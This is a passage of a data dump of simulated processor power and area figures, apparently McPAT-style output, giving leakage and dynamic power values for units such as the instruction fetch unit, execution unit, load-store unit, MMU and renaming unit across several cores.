'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0734183,
'L2/Runtime Dynamic': 0.0164294,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 4.12483,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.41181,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0934243,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0934243,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 4.5678,
'Load Store Unit/Runtime Dynamic': 1.96598,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.230368,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.460737,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0817585,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.082562,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.37675,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0599378,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.676593,
'Memory Management Unit/Runtime Dynamic': 0.1425,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 24.0499,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 1.38203e-05,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.0189003,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.191359,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 0.210273,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 5.86579,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0495887,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.241638,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.265616,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.115524,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.186336,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.0940563,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.395917,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.0914043,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.47088,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0501805,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0048456,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0536937,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0358362,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.103874,
'Execution Unit/Register Files/Runtime Dynamic': 0.0406818,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.125518,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.311915,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.39553,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000350937,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000350937,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000322059,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.00013364,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00051479,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00153872,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00277904,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0344503,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 2.19133,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.0797619,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.117009,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 4.5162,
'Instruction Fetch Unit/Runtime Dynamic': 0.235539,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0462159,
'L2/Runtime Dynamic': 0.00399916,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.59016,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.654742,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.043774,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.043774,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.79687,
'Load Store Unit/Runtime Dynamic': 0.914394,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.107939,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.215879,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0383079,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0390002,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.136249,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0130814,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.358164,
'Memory Management Unit/Runtime Dynamic': 0.0520816,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 15.7778,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.132002,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00681857,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0567221,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.195543,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 2.79709,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0980777,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.279723,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.621299,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.189316,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.30536,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.154135,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.648812,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.121269,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 5.10233,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.117377,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00794077,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.090414,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0587269,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.207791,
'Execution Unit/Register Files/Runtime Dynamic': 0.0666677,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.215002,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.561929,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.96251,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 2.12418e-05,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 2.12418e-05,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 1.8525e-05,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 7.18413e-06,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000843616,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.000904625,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.000202829,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0564557,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 3.59106,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.138931,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.191749,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 5.98386,
